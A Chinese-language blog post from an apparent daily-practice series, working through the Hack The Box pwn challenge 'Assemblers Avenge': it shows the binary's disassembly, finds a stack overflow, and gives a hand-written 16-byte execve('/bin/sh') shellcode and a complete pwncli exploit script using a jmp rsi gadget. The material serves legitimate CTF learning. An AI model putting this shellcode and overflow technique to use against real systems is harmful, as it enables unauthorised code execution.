selph
selph
Published on 2024-11-02 / 46 Visits
0
0

每日一练9:[HTB]Assemblers Avenge

前言

该题目是 shellcode 的编写练习

每日一题计划:督促自己练习,每日分享一题的练习!想一起刷题咱们可以一起练练练,以及,相互监督!

今天是第9天,今天做强网,一个也做不出来(悲伤

题目情况

Amidst the harrowing conflict, our city bore the brunt of relentless onslaughts, witnessing widespread devastation that spared little, ravaging both infrastructure and spirit alike. Now, as the dust settles and the echoes of chaos fade, a clarion call emerges: assemble a force to restore justice and herald a new era of tranquility. With the remnants of our past preserved within this binary, embark on your mission to reclaim our future.

    Arch:       amd64-64-little
    RELRO:      No RELRO
    Stack:      No canary found
    NX:         NX unknown - GNU_STACK missing
    PIE:        No PIE (0x400000)
    Stack:      Executable
    RWX:        Has RWX segments
    Stripped:   No

保护全关,疑似shellcode题

逆向分析

就这么几个函数:

.text:0000000000401000 ; Attributes: noreturn bp-based frame
.text:0000000000401000
.text:0000000000401000 ; void __fastcall __noreturn start(int, void *, size_t)
.text:0000000000401000                 public _start
.text:0000000000401000 _start          proc near               ; DATA XREF: LOAD:0000000000400018↑o
.text:0000000000401000                                         ; LOAD:0000000000400088↑o
.text:0000000000401000                 push    rbp
.text:0000000000401001                 mov     rbp, rsp
.text:0000000000401004                 sub     rsp, 20h
.text:0000000000401008                 call    _write
.text:000000000040100D                 call    _read
.text:0000000000401012                 call    _exit
.text:0000000000401012 _start          endp
.text:0000000000401012
.text:0000000000401017
.text:0000000000401017 ; =============== S U B R O U T I N E =======================================
.text:0000000000401017
.text:0000000000401017 ; Attributes: bp-based frame
.text:0000000000401017
.text:0000000000401017 ; ssize_t write(int fd, const void *buf, size_t n)
.text:0000000000401017 _write          proc near               ; CODE XREF: _start+8↑p
.text:0000000000401017                 push    rbp
.text:0000000000401018                 mov     rbp, rsp
.text:000000000040101B                 sub     rsp, 20h
.text:000000000040101F                 mov     rax, 1
.text:0000000000401026                 mov     rdi, 1          ; fd
.text:000000000040102D                 lea     rsi, message    ; "~~ When you stare into the abyss, the a"...
.text:0000000000401035                 mov     rdx, 62h ; 'b'  ; count
.text:000000000040103C                 syscall                 ; LINUX - sys_write
.text:000000000040103E                 leave
.text:000000000040103F                 retn
.text:000000000040103F _write          endp
.text:000000000040103F
.text:0000000000401040
.text:0000000000401040 ; =============== S U B R O U T I N E =======================================
.text:0000000000401040
.text:0000000000401040 ; Attributes: noreturn
.text:0000000000401040
.text:0000000000401040 ; void __noreturn exit(int status)
.text:0000000000401040 _exit           proc near               ; CODE XREF: _start+12↑p
.text:0000000000401040                 mov     rax, 1
.text:0000000000401047                 mov     rdi, 1          ; fd
.text:000000000040104E                 lea     rsi, goodbye    ; "\n~~ Farewell ~~\n"
.text:0000000000401056                 mov     rdx, 11h        ; count
.text:000000000040105D                 syscall                 ; LINUX - sys_write
.text:000000000040105F                 mov     rax, 3Ch ; '<'
.text:0000000000401066                 xor     rdi, rdi        ; error_code
.text:0000000000401069                 syscall                 ; LINUX - sys_exit
.text:000000000040106B                 jmp     rsi
.text:000000000040106B _exit           endp
.text:000000000040106B
.text:000000000040106D
.text:000000000040106D ; =============== S U B R O U T I N E =======================================
.text:000000000040106D
.text:000000000040106D ; Attributes: bp-based frame
.text:000000000040106D
.text:000000000040106D ; ssize_t read(int fd, void *buf, size_t nbytes)
.text:000000000040106D _read           proc near               ; CODE XREF: _start+D↑p
.text:000000000040106D
.text:000000000040106D buf             = byte ptr -8
.text:000000000040106D
.text:000000000040106D                 push    rbp
.text:000000000040106E                 mov     rbp, rsp
.text:0000000000401071                 sub     rsp, 10h
.text:0000000000401075                 mov     rdi, 0          ; fd
.text:000000000040107C                 lea     rsi, [rbp+buf]  ; buf
.text:0000000000401080                 mov     rdx, 18h        ; count
.text:0000000000401087                 mov     rax, 0
.text:000000000040108E                 syscall                 ; LINUX - sys_read
.text:0000000000401090                 leave
.text:0000000000401091                 retn
.text:0000000000401091 _read           endp
.text:0000000000401091
.text:0000000000401091 _text           ends

其中_read函数存在栈溢出

利用分析

当前状况分析:

  • 程序栈可执行,
  • 存在栈溢出,只能溢出16字节刚好覆盖rbp和返回地址
  • 提供了jmp rsi的gadget,且rsi就是输入的内容

如果输入shellcode的话,需要16字节以内完成执行,不然就得想办法扩大写入内容

但是程序提供了字符串可以用:

.data:000000000040204F                 db 0Ah
.data:0000000000402050                 db 'Your only savior is: /bin/sh',0
.data:000000000040206D ; char goodbye[]
.data:000000000040206D goodbye         db 0Ah          

手写shellcode编译提取:

Assemblers Avenge ➤ ./get_shellcode_raw.sh
shellcode.s: Assembler messages:
shellcode.s: Warning: end of file not at end of a line; newline inserted
00000000  48 c7 c7 65 20 40 00 31  d2 31 f6 6a 3b 58 0f 05  |H..e @.1.1.j;X..|
00000010
./get_shellcode_raw.sh: line 4:  : command not found

shellcode_elf:     file format elf64-x86-64


Disassembly of section .text:

0000000000401000 <_start>:
  401000:       48 c7 c7 65 20 40 00    mov    rdi,0x402065
  401007:       31 d2                   xor    edx,edx
  401009:       31 f6                   xor    esi,esi
  40100b:       6a 3b                   push   0x3b
  40100d:       58                      pop    rax
  40100e:       0f 05                   syscall

发现刚好满足16字节要求,直接提交即可

完整exp

#!/usr/bin/env python3
from pwncli import *
cli_script()

io: tube = gift.io
elf: ELF = gift.elf
libc: ELF = gift.libc


with open("shellcode_raw", "rb") as f:
    sc = f.read()

jmp_rsi = 0x000000000040106b
payload = sc + pack(jmp_rsi)
s(payload)
ia()

总结

shellcode题,手写shellcode

参考资料


Comment